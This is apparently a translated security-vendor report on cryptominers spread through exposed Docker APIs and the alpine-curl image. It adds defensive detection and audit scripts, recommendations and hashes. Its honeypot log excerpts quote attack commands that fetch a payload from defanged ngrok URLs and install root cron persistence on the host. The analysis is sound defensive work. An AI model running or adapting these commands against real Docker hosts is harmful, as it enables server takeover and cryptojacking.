How an unprotected Docker API and public community images are used to distribute cryptocurrency miners

We analysed data gathered from honeypots that we set up to track threats. We found significant activity from unwanted or unauthorised cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, scripts are deployed that use network tools to reach open neighbouring containers and applications.

We leave our honeypots as they are, that is, in the default configuration, without any security measures or additional software installed. Note that Docker publishes recommendations for initial setup that avoid simple mistakes and weaknesses. The honeypots used here are containers designed to detect attacks aimed at the containerisation platform itself, not at the applications inside the containers.

The detected malicious activity is also notable because it requires no vulnerability and does not depend on the Docker version. Finding a misconfigured, and therefore open, container image is all attackers need to infect many exposed servers.

An exposed Docker API lets a user perform a wide range of commands, including listing running containers, retrieving the logs of a specific container, starting and stopping (including forcibly) containers, and even creating a new container from a given image with specified settings.

On the left is the malware delivery process. On the right is the attacker's environment, which allows the image to be rolled out remotely.

Distribution by country of 3,762 exposed Docker APIs. Based on a Shodan search dated 12.02.2019.

Attack chain and payload options

The malicious activity was detected not only with the help of honeypots. Shodan data shows that the number of exposed Docker APIs (see the second figure) has grown since we examined a misconfigured container used as a bridge to deploy Monero cryptocurrency-mining software. In October of last year (2018; translator's note: the current figures may differ) there were only 856 open APIs.

Analysis of the honeypot logs showed that use of the container image was also associated with ngrok, a tool for establishing secure connections or forwarding traffic from publicly reachable endpoints to specified addresses or resources (for example, localhost). This lets attackers generate URLs dynamically when delivering a payload to an exposed server. Below are code samples from the logs showing abuse of the ngrok service:

Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the files are downloaded from a constantly changing URL. These URLs have a short lifetime, so the payload can no longer be downloaded once they have expired.
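The log entries above share a recognisable shape: a container created from a shell entrypoint whose command pulls a file from a short-lived ngrok URL, writes cron entries through a path that is clearly the host filesystem mounted into the container, and then chroots into that mount. The following triage script is an added example (not code from the original post or from Trend Micro) that turns that observation into detection logic over container-create requests. The request dicts are constructed to mirror the log entries; the Binds field is an assumption about how the host root reached the container, and the URLs are defanged as they are on the page.

```python
"""Triage Docker API container-create requests for the ngrok/cron/chroot pattern."""
import re

# Constructed samples: one ordinary request and one matching the observed chain.
SAMPLE_REQUESTS = [
    {
        "Image": "alpine:3.9",
        "Entrypoint": "/bin/sh",
        "Cmd": "-c echo hello",
        "Binds": [],
    },
    {
        "Image": "alpine-curl",
        "Entrypoint": "/bin/sh",
        "Cmd": (
            '-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfile1 '
            '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=1";'
            'echo "* * * * * root sh /tmp/tmpfile1" >/tmp9bedce/etc/crontab;'
            'echo "* * * * * root sh /tmp/tmpfile1" >/tmp9bedce/etc/cron.d/1m;'
            'chroot /tmp9bedce sh -c "cron || crond"'
        ),
        "Binds": ["/:/tmp9bedce"],  # assumed: host root mounted at /tmp9bedce
    },
]

# Each rule is (name, regex applied to the command string). The ngrok rule
# accepts both live and defanged ("[.]") hostnames so it works on reports too.
CMD_RULES = [
    ("ngrok-download", re.compile(r"ngrok(\[\.\]|\.)io", re.IGNORECASE)),
    ("download-to-tmp", re.compile(r"\bcurl\b.*?-o\s+/tmp")),
    ("cron-persistence", re.compile(r"/etc/cron(tab\b|\.d/)")),
    ("chroot-into-mount", re.compile(r"\bchroot\s+/")),
]


def _cmd_text(req):
    """The Docker API sends Cmd as a list; the logs above show it as a string."""
    cmd = req.get("Cmd") or req.get("Command") or ""
    return " ".join(cmd) if isinstance(cmd, list) else cmd


def score_request(req):
    """Return the names of every rule the request trips (empty list = clean)."""
    text = _cmd_text(req)
    hits = [name for name, rx in CMD_RULES if rx.search(text)]
    for bind in req.get("Binds") or []:
        # "/:/something" mounts the host root filesystem into the container,
        # which is what makes the crontab writes above land on the host.
        if bind.split(":", 1)[0] == "/":
            hits.append("host-root-mount")
    return hits


def triage(requests):
    """Return (image, findings) for every request that tripped at least one rule."""
    flagged = []
    for req in requests:
        hits = score_request(req)
        if hits:
            flagged.append((req.get("Image", "?"), hits))
    return flagged


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_REQUESTS):
        print(f"{image}: {', '.join(hits)}")
```

Any one rule on its own is noisy (plenty of legitimate jobs curl into /tmp); the combination of a host-root bind with cron writes and a chroot is what separates this chain from ordinary builds, so an alert should be raised on the set of findings, not on a single hit. Feeding the script real data means reading the create-container bodies from the daemon's debug log or an API proxy.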

There are two payload options. The first is an ELF miner compiled for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools used to scan network ranges and look for new targets.

The dropper script sets two variables that are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are located, and the RIP variable is the file name (in fact, the hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to check that no other cryptocurrency miners are already running on the attacked server.

Examples of the HOST and RIP variables, and the code snippet used to check that no other miners are running.

Before the miner is started, it is renamed to nginx. Other versions of the script rename the miner to other legitimate services that may be present in a Linux environment. This is usually enough to pass a check against the list of running processes.
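Because the miner is renamed to nginx, a check that only compares process names is exactly the check it is built to pass. A more robust host check compares the name a process reports with where its binary actually lives, which on Linux is the target of /proc/<pid>/exe. The script below is an added example, not from the original post: the process records are constructed, the expected binary paths are an assumed baseline for a typical Debian-style layout, and iter_live_procs() is a convenience for running the same check against a live Linux host.

```python
"""Flag processes whose name claims a service but whose binary does not match."""
import os
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    comm: str      # short name as shown by ps and /proc/<pid>/comm
    exe: str       # target of /proc/<pid>/exe; may end with " (deleted)"
    cmdline: str


# Assumed baseline: where each service's binary should live on this host.
EXPECTED_EXE = {
    "nginx": {"/usr/sbin/nginx"},
    "sshd": {"/usr/sbin/sshd"},
    "cron": {"/usr/sbin/cron"},
}

# Directories a long-running service should never be executing from.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed records: a real nginx master and a renamed binary in /tmp
# whose on-disk file has already been unlinked after launch.
SAMPLE_PROCS = [
    Proc(412, "nginx", "/usr/sbin/nginx", "nginx: master process /usr/sbin/nginx"),
    Proc(9031, "nginx", "/tmp/.x/nginx (deleted)", "./nginx"),
]


def check_process(p):
    """Return a list of findings for one process; empty means it looks consistent."""
    findings = []
    exe = p.exe
    if exe.endswith(" (deleted)"):
        findings.append("binary-deleted-on-disk")
        exe = exe[: -len(" (deleted)")]
    if p.comm in EXPECTED_EXE and exe not in EXPECTED_EXE[p.comm]:
        findings.append("name-path-mismatch")
    if exe.startswith(UNTRUSTED_DIRS):
        findings.append("runs-from-untrusted-dir")
    return findings


def scan(procs):
    """Return (pid, comm, findings) for every process with at least one finding."""
    results = []
    for p in procs:
        findings = check_process(p)
        if findings:
            results.append((p.pid, p.comm, findings))
    return results


def iter_live_procs():
    """Yield Proc records from /proc on a Linux host; unreadable pids are skipped."""
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # kernel threads have no exe; other pids may be unreadable
        yield Proc(int(pid), comm, exe, cmdline)


if __name__ == "__main__":
    for pid, comm, findings in scan(SAMPLE_PROCS):
        print(f"pid {pid} ({comm}): {', '.join(findings)}")
```

The "(deleted)" suffix is worth its own finding: a service binary that has been removed from disk while its process keeps running is rare for legitimate software and common for droppers that clean up after themselves. Reading /proc/<pid>/exe for processes owned by other users requires root.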

The scanning script has features of its own. It uses the same URL service to deploy the tools it needs. Among them is the zmap binary, used to scan networks and obtain a list of open ports. The script also loads another binary that interacts with the discovered services and grabs banners from them to learn more about each service (for example, its version).

The script also predefines some network ranges to scan, although this depends on the version of the script. It sets the target ports for the service of interest (in this case, Docker) before running the scan.

Once potential targets are found, their banners are grabbed automatically. The script also filters targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client and Apache CouchDB. If a scanned server matches any of them, it is saved to a text file that the attackers can later use for analysis and compromise. These text files are uploaded to the attackers' servers via dynamic links, that is, a separate URL is used for each file, which makes later access to them difficult.

The attack vector is the Docker image, as the following two code fragments show.

Above: the miner is renamed to a legitimate service. Below: how zmap is used to scan the network.

Above: the predefined network ranges. Below: the ports defined for service discovery, including Docker.

Screenshot showing that the alpine-curl image has been pulled more than ten million times.

The image is built on Alpine Linux and curl, a resource-efficient CLI tool for transferring files over various protocols. As the previous figure shows, this image has been downloaded more than ten million times. The large number of downloads may be explained by the image being used as an entry point: the image was last updated more than six months ago, and users do not download the other images in this repository nearly as often. In Docker, the entry point is the set of instructions used to configure a container and run it. If the entry point settings are wrong (for example, the container is left exposed to the Internet), the image can be used as an attack vector. Attackers can use it to deliver a payload if they find a misconfigured or unmaintained open container.

It is important to keep in mind that the image itself (alpine-curl) is not malicious, but, as shown above, it can be used to perform malicious functions. Similar Docker images can also be used for malicious activity. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a constant problem for many companies, especially those adopting DevOps with its focus on rapid development and delivery. The problem is compounded by the need to comply with audit and monitoring requirements, the need to protect data confidentiality, and the heavy damage that non-compliance causes. Building security automation into the development lifecycle not only helps you find security holes that might otherwise go undetected, but also reduces unnecessary work, such as running an extra software build for every vulnerability or misconfiguration found after an application has been deployed.

The incident discussed in this article underscores the need to consider security from the very beginning, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
  • Follow the recommendations and enable the available security mechanisms, for example those from Docker and those built into the security features.
  • Use automated scanning of runtimes and images to obtain additional information about the processes running inside containers (for example, to detect spoofing or search for vulnerabilities). Application control and integrity monitoring help track anomalous changes to servers, files and system areas.
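The first two recommendations come down to a handful of settings in the daemon's configuration: where the API listens, whether clients must present a certificate, and whether containers run with more privilege than they need. The audit script below is an added example, not from the original post or from Docker; the two daemon.json documents are constructed, the internal address in the hardened one is an assumption, and the TLS file paths are the ones Docker's own documentation uses as examples.

```python
"""Audit a Docker daemon.json for the exposure described in this article."""
import json

# Constructed: the configuration Shodan finds. Plain TCP on every interface,
# no client authentication, every other setting at its default.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"],
})

# Constructed hardened counterpart: bound to an (assumed) internal address,
# client certificates required, inter-container traffic off, container root
# remapped to an unprivileged host user, no privilege escalation in containers.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["tcp://10.0.0.5:2376", "unix:///var/run/docker.sock"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
    "icc": False,
    "userns-remap": "default",
    "no-new-privileges": True,
})

TLS_FILES = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(text):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    cfg = json.loads(text)
    findings = []
    for h in cfg.get("hosts", []):
        if not h.startswith("tcp://"):
            continue  # unix sockets are protected by filesystem permissions
        host = h[len("tcp://"):].rsplit(":", 1)[0]
        if host in ("", "0.0.0.0", "[::]"):
            findings.append(f"{h}: API bound to all interfaces")
        if not cfg.get("tlsverify"):
            findings.append(f"{h}: TCP listener without tlsverify (no client authentication)")
    if cfg.get("tlsverify") and not all(k in cfg for k in TLS_FILES):
        findings.append("tlsverify set but tlscacert/tlscert/tlskey missing")
    if cfg.get("icc", True):
        findings.append("icc not disabled: containers can reach each other freely")
    if "userns-remap" not in cfg:
        findings.append("userns-remap unset: container root maps to host uid 0")
    if not cfg.get("no-new-privileges"):
        findings.append("no-new-privileges unset")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"== {label} ==")
        for f in audit_daemon_config(text) or ["no findings"]:
            print(" -", f)
```

Two caveats when applying this to a real host. With the stock systemd unit on Debian and Ubuntu, a "hosts" key in daemon.json conflicts with the -H flag in the unit's ExecStart and the daemon will refuse to start until one of the two is removed. And tlsverify only authenticates clients; whether a client that does authenticate is allowed to bind the host root into a container is still decided by who holds the client certificate, so the certificate is as sensitive as a root password.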

Trend Micro helps DevOps teams build securely, ship quickly and launch anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined and automated security across an organisation's DevOps pipeline and delivers multiple XGen threat defences to protect physical, virtual and cloud workloads at runtime. It also adds container security with Deep Security and Deep Security Smart Check, which scans Docker container images for malware and vulnerabilities at any point in the development pipeline to stop threats before they are deployed.

Indicators of compromise

Affected hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker video course, the presenting instructors show which settings should be made first to reduce the likelihood of, or entirely avoid, the situation described above. And on August 19-21, at the online intensive DevOps Tools & Cheats, you can discuss these and similar security problems with colleagues and practising instructors at a round table, where everyone can speak and listen to the pains and successes of experienced peers.

Source: www.habr.com
